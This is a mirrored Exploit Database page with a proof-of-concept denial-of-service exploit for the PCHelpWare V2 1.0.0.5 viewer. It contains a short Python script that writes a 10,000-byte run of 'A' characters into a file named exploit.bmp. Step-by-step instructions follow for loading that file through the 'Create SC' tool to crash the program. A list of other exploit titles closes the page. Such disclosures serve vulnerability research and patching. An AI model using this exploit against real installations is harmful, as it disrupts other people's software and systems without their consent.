PCHelpWare V2 1.0.0.5 – ‘SC’ Denial of Service (PoC)

Exploit Database
17 阅读

作者： Alejandra Sánchez

日期： 2019-04-16
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46708/

# -*- coding: utf-8 -*-
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)
# Date: 15/04/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.uvnc.com/home.html
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
# Version: 1.0.0.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"
# 2.- Open PCHelpWareV2 Viewer
# 3.- Go to Tools -> Create SC
# 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created
# 5.- Click on button -> Create SC
# 6.- Crashed

buffer = "\x41" * 10000

f = open ("exploit.bmp", "w")
f.write(buffer)
f.close()

last Exploits
PCHelpWare V2 1.0.0.5 – ‘SC’ Denial of Service (PoC)的更多信息

Notepad3 1.0.2.350 – Denial of Service (PoC)：
OneHTTPD 0.8 – Crash (PoC)：
JCraft/JSch Java Secure Channel 0.1.53 – Recursive sftp-get Directory Traversal：
GDI+ – ‘gdiplus.dll’ CreateDashedPath Integer Overflow：
BulletProof FTP Client 2010 – Buffer Overflow (PoC)：
TRENDnet SecurView Wireless Network Camera TV-IP422WN – ‘UltraCamX.ocx’ Stack Buffer Overflow (PoC)：
Cisco Smart Install – Crash (PoC)：
Adobe Photoshop CS6 – ‘.png’ Parsing Heap Overflow：